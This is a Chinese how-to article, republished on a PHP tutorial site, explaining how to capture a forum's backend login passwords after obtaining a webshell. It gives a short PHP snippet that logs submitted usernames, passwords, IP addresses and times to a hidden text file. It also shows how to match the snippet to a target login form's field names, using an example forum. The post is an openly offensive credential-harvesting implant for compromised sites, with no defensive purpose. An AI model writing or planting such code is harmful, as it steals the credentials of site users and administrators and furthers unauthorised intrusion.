截取php后台登陆密码的代码-php手册-php.cn

Home

php教程

php手册

截取php后台登陆密码的代码

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 13, 2016 am 10:42 AM

discuzphpwebshellcodeBackstagepasswordinterceptLoginoffurther

拿到webshell之后，想要进一步渗透，诸如discuz的密码，不是直接用md5加密的，破解难度很大。以前帮大头写过一次，昨天小猪大哥正好用到，就又写了一遍。代码比较简单，就几句话，我把原理说的详细点，照顾下对php不太了解有朋友。

if($_POST[loginsubmit]!=){ //判断是否点了登陆按钮

$sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // 把POST接收到的值连起来赋值给变量$sb

fwrite(fopen(robot.txt,ab),$sb);} //结果写入一个文件

下面简单分析一下,以华夏的登陆页面为例。打开bbs.xxx.com/login.php 右键查看源码,CTRL+F搜索action找到登陆的表单。

我只复制了关键代码过来.

。。。。强大的省略号。。。。。。

账号(U):

class=input id=pwuser accessKey=u size=16

name=pwuser>

//用户名的input输入框, 注意其name的值，要和$_POST[username] 这里面的对应, 所以要截取华夏的密码，需要改为 $_POST[pwuser]

密　码(P):

class=input id=pwpwd accessKey=p

type=password size=16 name=pwpwd>

//用户名的input输入框, 注意其name的值，要和$_POST[username] 这里面的对应, 所以要截取华夏的密码，需要改为 $_POST[pwpwd]

Statement

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

What's New in Windows 11 KB5054979 & How to Fix Update Issues

3 weeks agoByDDD

How to fix KB5055523 fails to install in Windows 11?

2 weeks agoByDDD

InZoi: How To Apply To School And University

4 weeks agoByDDD

How to fix KB5055518 fails to install in Windows 10?

2 weeks agoByDDD

Where to find the Site Office Key in Atomfall

4 weeks agoByDDD

Hot Tools

SublimeText3 English version

Recommended: Win version, supports code prompts!

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Mac version

God-level code editing software (SublimeText3)

SecLists

SecLists is the ultimate security tester's companion. It is a collection of various types of lists that are frequently used during security assessments, all in one place. SecLists helps make security testing more efficient and productive by conveniently providing all the lists a security tester might need. List types include usernames, passwords, URLs, fuzzing payloads, sensitive data patterns, web shells, and more. The tester can simply pull this repository onto a new test machine and he will have access to every type of list he needs.

SAP NetWeaver Server Adapter for Eclipse

Integrate Eclipse with SAP NetWeaver application server.

Hot Topics

Where is the login entrance for gmail email?

7871

1649

1407

1301

1245